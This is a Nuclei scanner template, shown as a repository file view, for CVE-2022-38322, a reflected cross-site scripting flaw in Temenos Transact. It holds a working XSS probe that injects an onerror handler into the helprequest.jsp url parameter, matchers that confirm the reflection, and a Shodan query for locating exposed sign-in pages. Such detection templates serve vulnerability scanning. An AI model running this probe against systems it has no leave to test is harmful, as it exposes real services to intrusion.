nuclei-templates/http/cves/2022/CVE-2022-38322.yaml

37 lines
1.1 KiB
YAML
Raw Normal View History

id: CVE-2022-38322
info:
2024-07-23 06:42:31 +00:00
name: Temenos Transact - Cross-Site Scripting
author: qotoz
severity: high
description: |
Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks.
reference:
- https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/
metadata:
verified: true
max-request: 1
shodan-query: http.title:"transact sign in","t24 sign in"
tags: cve,cve2022,temenos,transact,xss
http:
- method: GET
path:
- "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22"
matchers-condition: and
matchers:
- type: word
part: body
words:
- setupHelp('')" onerror="confirm('document.domain')
2024-07-23 06:42:31 +00:00
- type: word
part: content_type
words:
- 'text/html'
2024-07-23 06:45:46 +00:00
- type: status
status:
- 200
# digest: 490a0046304402206e0fdc6fcdacae40c482dddc8334c22e816c8c734fadd3874bcd0e0fe6ca8eff022011d920d8db43fcbb74db42290aa9b151c02956dd656a05d82430d1c2c923b3ae:922c64590222798bb761d5b6d8e72950